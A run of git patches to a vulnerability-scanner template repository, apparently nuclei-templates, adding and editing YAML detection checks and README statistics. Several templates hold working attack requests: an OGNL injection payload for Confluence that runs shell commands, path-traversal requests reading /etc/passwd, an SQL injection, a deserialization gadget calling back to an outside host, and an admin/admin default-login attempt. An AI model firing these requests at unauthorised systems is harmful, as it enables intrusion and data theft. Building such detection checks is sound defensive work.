| | | | | | +| sophos | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| phpfastcache | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| bullwark | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 9516a71bfa..69f64f98aa 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | -| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | -| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | -| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | -| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | -| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | +| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | +| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | +| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | +| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | +| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | +| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | +| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | | From cc20420c94e59d5cd4f86ec4b76f178b5da32e39 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 31 Aug 2021 16:30:41 +0000 Subject: [PATCH 1953/4083] Auto Update README [Tue Aug 31 16:30:41 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index ee37e1923f..a447037293 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 632 | dhiyaneshdk | 245 | cves | 640 | info | 603 | http | 1807 | -| panel | 232 | pikpikcu | 244 | vulnerabilities | 283 | high | 510 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 231 | medium | 402 | network | 38 | -| exposure | 214 | daffainfo | 164 | exposures | 184 | critical | 232 | dns | 11 | -| lfi | 207 | geeknik | 149 | technologies | 163 | low | 160 | | | -| wordpress | 203 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 189 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 51 | | | | | -| wp-plugin | 136 | princechaddha | 54 | file | 46 | | | | | -| tech | 105 | pussycat0x | 44 | workflows | 35 | | | | | +| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | +| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | +| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | +| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | +| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | +| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | +| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | +| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | +| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | | -**146 directories, 1962 files**. +**147 directories, 1989 files**. From f1f5add7971078c239c9862c361f834fa9bdbb61 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 1 Sep 2021 02:10:27 +0530 Subject: [PATCH 1954/4083] Added CVE-2021-26084 Co-Authored-By: Dhiyaneshwaran --- cves/2021/CVE-2021-26084.yaml | 40 +++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 cves/2021/CVE-2021-26084.yaml diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml new file mode 100644 index 0000000000..94db346c96 --- /dev/null +++ b/cves/2021/CVE-2021-26084.yaml @@ -0,0 +1,40 @@ +id: CVE-2021-26084 + +info: + author: dhiyaneshDk + severity: critical + name: Confluence Server Webwork OGNL injection + description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. + tags: cve,cve2021,rce,confluence + reference: + - https://jira.atlassian.com/browse/CONFSERVER-67940. + - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + +requests: + - raw: + - | + POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 + Host: {{Hostname}} + Cookie: JSESSIONID=8BD8230F42BCD41F5C3B7A882163FA14; mywork.tab.tasks=false + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0 + Accept-Encoding: gzip, deflate + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 + Upgrade-Insecure-Requests: 1 + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + + queryString=aaaaaaaa\u0027%2b{Class.forName(\u0027javax.script.ScriptEngineManager\u0027).newInstance().getEngineByName(\u0027JavaScript\u0027).\u0065val(\u0027var+isWin+%3d+java.lang.System.getProperty(\u0022os.name\u0022).toLowerCase().contains(\u0022win\u0022)%3b+var+cmd+%3d+new+java.lang.String(\u0022ifconfig\u0022)%3bvar+p+%3d+new+java.lang.ProcessBuilder()%3b+if(isWin){p.command(\u0022cmd.exe\u0022,+\u0022/c\u0022,+cmd)%3b+}+else{p.command(\u0022bash\u0022,+\u0022-c\u0022,+cmd)%3b+}p.redirectErrorStream(true)%3b+var+process%3d+p.start()%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader(process.getInputStream())%3b+var+bufferedReader+%3d+new+java.io.BufferedReader(inputStreamReader)%3b+var+line+%3d+\u0022\u0022%3b+var+output+%3d+\u0022\u0022%3b+while((line+%3d+bufferedReader.readLine())+!%3d+null){output+%3d+output+%2b+line+%2b+java.lang.Character.toString(10)%3b+}\u0027)}%2b\u0027 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - 'inet' + - 'inet6' + - 'netmask' + condition: and \ No newline at end of file From 8d5172ed6214856c6d1342479001b4bbf3148d4b Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 1 Sep 2021 02:11:40 +0530 Subject: [PATCH 1955/4083] Removed unused headers Co-Authored-By: Dhiyaneshwaran --- cves/2021/CVE-2021-26084.yaml | 6 ------ 1 file changed, 6 deletions(-) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index 94db346c96..ca5d2a644e 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -15,12 +15,6 @@ requests: - | POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 Host: {{Hostname}} - Cookie: JSESSIONID=8BD8230F42BCD41F5C3B7A882163FA14; mywork.tab.tasks=false - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0 - Accept-Encoding: gzip, deflate - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 - Upgrade-Insecure-Requests: 1 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded queryString=aaaaaaaa\u0027%2b{Class.forName(\u0027javax.script.ScriptEngineManager\u0027).newInstance().getEngineByName(\u0027JavaScript\u0027).\u0065val(\u0027var+isWin+%3d+java.lang.System.getProperty(\u0022os.name\u0022).toLowerCase().contains(\u0022win\u0022)%3b+var+cmd+%3d+new+java.lang.String(\u0022ifconfig\u0022)%3bvar+p+%3d+new+java.lang.ProcessBuilder()%3b+if(isWin){p.command(\u0022cmd.exe\u0022,+\u0022/c\u0022,+cmd)%3b+}+else{p.command(\u0022bash\u0022,+\u0022-c\u0022,+cmd)%3b+}p.redirectErrorStream(true)%3b+var+process%3d+p.start()%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader(process.getInputStream())%3b+var+bufferedReader+%3d+new+java.io.BufferedReader(inputStreamReader)%3b+var+line+%3d+\u0022\u0022%3b+var+output+%3d+\u0022\u0022%3b+while((line+%3d+bufferedReader.readLine())+!%3d+null){output+%3d+output+%2b+line+%2b+java.lang.Character.toString(10)%3b+}\u0027)}%2b\u0027 From c81725e991cf274d64d7dc49d71f520b8c0d694e Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 1 Sep 2021 12:36:20 +0530 Subject: [PATCH 1956/4083] Removed duplicate template --- cves/2020/CVE-2019-9618.yaml | 26 -------------------------- 1 file changed, 26 deletions(-) delete mode 100644 cves/2020/CVE-2019-9618.yaml diff --git a/cves/2020/CVE-2019-9618.yaml b/cves/2020/CVE-2019-9618.yaml deleted file mode 100644 index 47d0f46a02..0000000000 --- a/cves/2020/CVE-2019-9618.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: CVE-2019-9618 - -info: - name: GraceMedia Media Player 1.0 - Local File Inclusion - author: 0x_Akoko - severity: critical - reference: - - https://www.exploit-db.com/exploits/46537 - - https://nvd.nist.gov/vuln/detail/CVE-2019-9618 - tags: cve,cve2019,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 \ No newline at end of file From faf111362c79f91e44ec42a77c6e9015a574ee14 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 1 Sep 2021 12:37:02 +0530 Subject: [PATCH 1957/4083] Removing extra space --- vulnerabilities/generic/generic-blind-xxe.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/vulnerabilities/generic/generic-blind-xxe.yaml b/vulnerabilities/generic/generic-blind-xxe.yaml index e061bbc2a0..a08f153493 100644 --- a/vulnerabilities/generic/generic-blind-xxe.yaml +++ b/vulnerabilities/generic/generic-blind-xxe.yaml @@ -14,7 +14,6 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: {{BaseURL}} - &e1; From 8ccc715ceb540308af373079f79b73cab50afbc4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 1 Sep 2021 15:20:47 +0700 Subject: [PATCH 1958/4083] Create CVE-2010-2122.yaml --- cves/2010/CVE-2010-2122.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2122.yaml diff --git a/cves/2010/CVE-2010-2122.yaml b/cves/2010/CVE-2010-2122.yaml new file mode 100644 index 0000000000..971662b321 --- /dev/null +++ b/cves/2010/CVE-2010-2122.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2122 + +info: + name: Joomla! Component simpledownload 0.9.5 - Local File Disclosure + author: daffainfo + severity: high + description: Directory traversal vulnerability in the SimpleDownload (com_simpledownload) component before 0.9.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12623 + - https://www.cvedetails.com/cve/CVE-2010-2122 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=/configuration.php" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 344e492212bde02e70c23c32209243028f9a7ff9 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 1 Sep 2021 13:58:30 +0530 Subject: [PATCH 1959/4083] Update CVE-2010-2122.yaml --- cves/2010/CVE-2010-2122.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2010/CVE-2010-2122.yaml b/cves/2010/CVE-2010-2122.yaml index 971662b321..78a3fb66d0 100644 --- a/cves/2010/CVE-2010-2122.yaml +++ b/cves/2010/CVE-2010-2122.yaml @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=/configuration.php" + - "{{BaseURL}}/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: From 510b70d1aef9ba616b13d7bf29bc2cb803aca79c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 1 Sep 2021 15:29:40 +0700 Subject: [PATCH 1960/4083] Create CVE-2010-1981.yaml --- cves/2010/CVE-2010-1981.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1981.yaml diff --git a/cves/2010/CVE-2010-1981.yaml b/cves/2010/CVE-2010-1981.yaml new file mode 100644 index 0000000000..bb141c636c --- /dev/null +++ b/cves/2010/CVE-2010-1981.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1981 + +info: + name: Joomla! Component Fabrik 2.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12087 + - https://www.cvedetails.com/cve/CVE-2010-1981 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 6d5f00b199cde75279d3cb8dd1a31fbf9c34135e Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 1 Sep 2021 15:59:13 +0700 Subject: [PATCH 1961/4083] Create druid-detect.yaml --- technologies/druid-detect.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 technologies/druid-detect.yaml diff --git a/technologies/druid-detect.yaml b/technologies/druid-detect.yaml new file mode 100644 index 0000000000..8cdd990c9e --- /dev/null +++ b/technologies/druid-detect.yaml @@ -0,0 +1,23 @@ +id: druid-detect + +info: + name: Druid monitor Detect + author: pikpikcu + severity: info + tags: tech,druid + +requests: + - method: GET + path: + - "{{BaseURL}}/druid/login.html" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "druid monitor" + - type: status + status: + - 200 From 7fcb9bd496adc55967099ee60f7a289cd3bfefd0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 1 Sep 2021 16:02:41 +0700 Subject: [PATCH 1962/4083] Create druid-default-password.yaml --- .../druid/druid-default-password.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 default-logins/druid/druid-default-password.yaml diff --git a/default-logins/druid/druid-default-password.yaml b/default-logins/druid/druid-default-password.yaml new file mode 100644 index 0000000000..0696eafd4a --- /dev/null +++ b/default-logins/druid/druid-default-password.yaml @@ -0,0 +1,26 @@ +id: druid-default-password + +info: + name: Druid Default Password + author: pikpikcu + severity: high + tags: druid,default-login + +requests: + - method: POST + path: + - "{{BaseURL}}/druid/submitLogin" + - "{{BaseURL}}/submitLogin" + body: "loginUsername=admin&loginPassword=admin" + + matchers-condition: and + matchers: + + - type: word + words: + - 'success' + part: body + condition: and + - type: status + status: + - 200 From ff05dfd60b33d4abab9191a080653a749baab490 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 1 Sep 2021 17:45:54 +0530 Subject: [PATCH 1963/4083] Create CVE-2021-31856.yaml --- cves/2021/CVE-2021-31856.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2021/CVE-2021-31856.yaml diff --git a/cves/2021/CVE-2021-31856.yaml b/cves/2021/CVE-2021-31856.yaml new file mode 100644 index 0000000000..deb18ee2f2 --- /dev/null +++ b/cves/2021/CVE-2021-31856.yaml @@ -0,0 +1,28 @@ +id: CVE-2021-31856 + +info: + name: Layer5 Meshery 0.5.2 SQLi + author: princechaddha + severity: critical + description: A SQL Injection vulnerability in the REST API in Layer5 Meshery 0.5.2 allows an attacker to execute arbitrary SQL commands via the /experimental/patternfiles endpoint (order parameter in GetMesheryPatterns in models/meshery_pattern_persister.go). + reference: + - https://github.com/ssst0n3/CVE-2021-31856 + - https://nvd.nist.gov/vuln/detail/CVE-2021-31856 + tags: sqli,cve,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0" + + matchers-condition: and + matchers: + + - type: word + words: + - "709b38b27304df6257a86a60df742c4c" + part: body + + - type: status + status: + - 200 From 0476580090a8ff8186cc00afa88e22a509fc952f Mon Sep 17 00:00:00 2001 From: Wyatt Dahlenburg Date: Wed, 1 Sep 2021 10:13:55 -0500 Subject: [PATCH 1964/4083] Adding CVE-2015-7450 --- cves/2015/CVE-2015-7450.yaml | 44 ++++++++++++++++++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 cves/2015/CVE-2015-7450.yaml diff --git a/cves/2015/CVE-2015-7450.yaml b/cves/2015/CVE-2015-7450.yaml new file mode 100644 index 0000000000..65da4f704a --- /dev/null +++ b/cves/2015/CVE-2015-7450.yaml @@ -0,0 +1,44 @@ +id: CVE-2015-7450 + +info: + name: CVE-2015-7450 + author: wdahlenb + severity: critical + description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) + reference: https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py + tags: cve,cve2015,websphere,deserialization + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml; charset=utf-8 + SOAPAction: "urn:AdminService" + + + + + + + + rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== + getUnsavedChanges + {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64")}} + rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= + + + + + matchers-condition: and + matchers: + - type: status + status: + - 500 + - type: word + words: + - 'SOAP-ENV:Server' + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" From d8110ed63f5f712a3cc4d6d3a46ac99a7ab33985 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Wed, 1 Sep 2021 12:18:30 -0400 Subject: [PATCH 1965/4083] Update openam-detection.yaml updated using new flag stop-at-first-match: true --- technologies/openam-detection.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/openam-detection.yaml b/technologies/openam-detection.yaml index fbb240676d..b3c603dde0 100644 --- a/technologies/openam-detection.yaml +++ b/technologies/openam-detection.yaml @@ -29,6 +29,7 @@ requests: - "{{BaseURL}}/openam/json/serverinfo/*" redirects: true + stop-at-first-match: true max-redirects: 2 matchers-condition: and matchers: From 664845597bab0647dd9d0e52d53cc5ce6edd20e4 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Wed, 1 Sep 2021 12:25:12 -0400 Subject: [PATCH 1966/4083] Update phpmyadmin-panel.yaml Stopping at first match (stop-at-first-match: true) With the id (html) "pmahomme" you will find hidden phpmyadmin instances (status 301) those instances do not show the title. The title can be easily change but id are not that simple to get rid of. --- exposed-panels/phpmyadmin-panel.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/exposed-panels/phpmyadmin-panel.yaml b/exposed-panels/phpmyadmin-panel.yaml index 51499eeae1..50995a2d16 100644 --- a/exposed-panels/phpmyadmin-panel.yaml +++ b/exposed-panels/phpmyadmin-panel.yaml @@ -21,12 +21,13 @@ requests: - "{{BaseURL}}/web/phpmyadmin/" - "{{BaseURL}}/xampp/phpmyadmin/" - "{{BaseURL}}/phpMyAdmin/" - + + stop-at-first-match: true matchers: - type: word words: - "phpMyAdmin" - + - "pmahomme" extractors: - type: regex part: body From 38b456eb346de223ed2175736759cd5fc46172b1 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 00:04:06 +0530 Subject: [PATCH 1967/4083] safe payload + reference --- cves/2021/CVE-2021-26084.yaml | 14 ++++++-------- 1 file changed, 6 insertions(+), 8 deletions(-) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index ca5d2a644e..ec8c1ea4f3 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -3,11 +3,12 @@ id: CVE-2021-26084 info: author: dhiyaneshDk severity: critical - name: Confluence Server Webwork OGNL injection + name: Confluence Server OGNL injection - RCE description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if ‘Allow people to sign up to create their account’ is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. tags: cve,cve2021,rce,confluence reference: - - https://jira.atlassian.com/browse/CONFSERVER-67940. + - https://jira.atlassian.com/browse/CONFSERVER-67940 + - https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 requests: @@ -17,8 +18,8 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - queryString=aaaaaaaa\u0027%2b{Class.forName(\u0027javax.script.ScriptEngineManager\u0027).newInstance().getEngineByName(\u0027JavaScript\u0027).\u0065val(\u0027var+isWin+%3d+java.lang.System.getProperty(\u0022os.name\u0022).toLowerCase().contains(\u0022win\u0022)%3b+var+cmd+%3d+new+java.lang.String(\u0022ifconfig\u0022)%3bvar+p+%3d+new+java.lang.ProcessBuilder()%3b+if(isWin){p.command(\u0022cmd.exe\u0022,+\u0022/c\u0022,+cmd)%3b+}+else{p.command(\u0022bash\u0022,+\u0022-c\u0022,+cmd)%3b+}p.redirectErrorStream(true)%3b+var+process%3d+p.start()%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader(process.getInputStream())%3b+var+bufferedReader+%3d+new+java.io.BufferedReader(inputStreamReader)%3b+var+line+%3d+\u0022\u0022%3b+var+output+%3d+\u0022\u0022%3b+while((line+%3d+bufferedReader.readLine())+!%3d+null){output+%3d+output+%2b+line+%2b+java.lang.Character.toString(10)%3b+}\u0027)}%2b\u0027 - + queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb + # queryString=aaaaaaaa\u0027%2b{Class.forName(\u0027javax.script.ScriptEngineManager\u0027).newInstance().getEngineByName(\u0027JavaScript\u0027).\u0065val(\u0027var+isWin+%3d+java.lang.System.getProperty(\u0022os.name\u0022).toLowerCase().contains(\u0022win\u0022)%3b+var+cmd+%3d+new+java.lang.String(\u0022ifconfig\u0022)%3bvar+p+%3d+new+java.lang.ProcessBuilder()%3b+if(isWin){p.command(\u0022cmd.exe\u0022,+\u0022/c\u0022,+cmd)%3b+}+else{p.command(\u0022bash\u0022,+\u0022-c\u0022,+cmd)%3b+}p.redirectErrorStream(true)%3b+var+process%3d+p.start()%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader(process.getInputStream())%3b+var+bufferedReader+%3d+new+java.io.BufferedReader(inputStreamReader)%3b+var+line+%3d+\u0022\u0022%3b+var+output+%3d+\u0022\u0022%3b+while((line+%3d+bufferedReader.readLine())+!%3d+null){output+%3d+output+%2b+line+%2b+java.lang.Character.toString(10)%3b+}\u0027)}%2b\u0027 matchers-condition: and matchers: - type: status @@ -28,7 +29,4 @@ requests: - type: word part: body words: - - 'inet' - - 'inet6' - - 'netmask' - condition: and \ No newline at end of file + - 'value="aaaa{140592=null}' \ No newline at end of file From 4d6693fbf08820e7315d56fd9d31a4b40d3056a2 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 00:14:43 +0530 Subject: [PATCH 1968/4083] Added workflow validation --- .github/workflows/template-validate.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index d579d09744..d0d3ede28e 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -32,4 +32,5 @@ jobs: - name: Template Validation run: | nuclei -validate -t . -exclude .pre-commit-config.yaml + nuclei -validate -w ./workflows -exclude .pre-commit-config.yaml shell: bash \ No newline at end of file From d34316e51bda66fdd93318c0b3c543d838f271e7 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 00:21:43 +0530 Subject: [PATCH 1969/4083] Update phpmyadmin-panel.yaml --- exposed-panels/phpmyadmin-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/phpmyadmin-panel.yaml b/exposed-panels/phpmyadmin-panel.yaml index 50995a2d16..c3016dc1cc 100644 --- a/exposed-panels/phpmyadmin-panel.yaml +++ b/exposed-panels/phpmyadmin-panel.yaml @@ -21,13 +21,14 @@ requests: - "{{BaseURL}}/web/phpmyadmin/" - "{{BaseURL}}/xampp/phpmyadmin/" - "{{BaseURL}}/phpMyAdmin/" - + stop-at-first-match: true matchers: - type: word words: - "<title>phpMyAdmin" - "pmahomme" + extractors: - type: regex part: body From 6c1dc4de74adf25a4d864095cceb78518e8a206a Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Thu, 2 Sep 2021 00:28:41 +0530 Subject: [PATCH 1970/4083] avoiding lint warnings --- cves/2021/CVE-2021-26084.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-26084.yaml b/cves/2021/CVE-2021-26084.yaml index ec8c1ea4f3..c37f54cd81 100644 --- a/cves/2021/CVE-2021-26084.yaml +++ b/cves/2021/CVE-2021-26084.yaml @@ -19,7 +19,7 @@ requests: Content-Type: application/x-www-form-urlencoded queryString=aaaa\u0027%2b#{16*8787}%2b\u0027bbb - # queryString=aaaaaaaa\u0027%2b{Class.forName(\u0027javax.script.ScriptEngineManager\u0027).newInstance().getEngineByName(\u0027JavaScript\u0027).\u0065val(\u0027var+isWin+%3d+java.lang.System.getProperty(\u0022os.name\u0022).toLowerCase().contains(\u0022win\u0022)%3b+var+cmd+%3d+new+java.lang.String(\u0022ifconfig\u0022)%3bvar+p+%3d+new+java.lang.ProcessBuilder()%3b+if(isWin){p.command(\u0022cmd.exe\u0022,+\u0022/c\u0022,+cmd)%3b+}+else{p.command(\u0022bash\u0022,+\u0022-c\u0022,+cmd)%3b+}p.redirectErrorStream(true)%3b+var+process%3d+p.start()%3b+var+inputStreamReader+%3d+new+java.io.InputStreamReader(process.getInputStream())%3b+var+bufferedReader+%3d+new+java.io.BufferedReader(inputStreamReader)%3b+var+line+%3d+\u0022\u0022%3b+var+output+%3d+\u0022\u0022%3b+while((line+%3d+bufferedReader.readLine())+!%3d+null){output+%3d+output+%2b+line+%2b+java.lang.Character.toString(10)%3b+}\u0027)}%2b\u0027 + matchers-condition: and matchers: - type: status From 4f5c28eabfae1f300b107fa7fd28474d6fe60c18 Mon Sep 17 00:00:00 2001 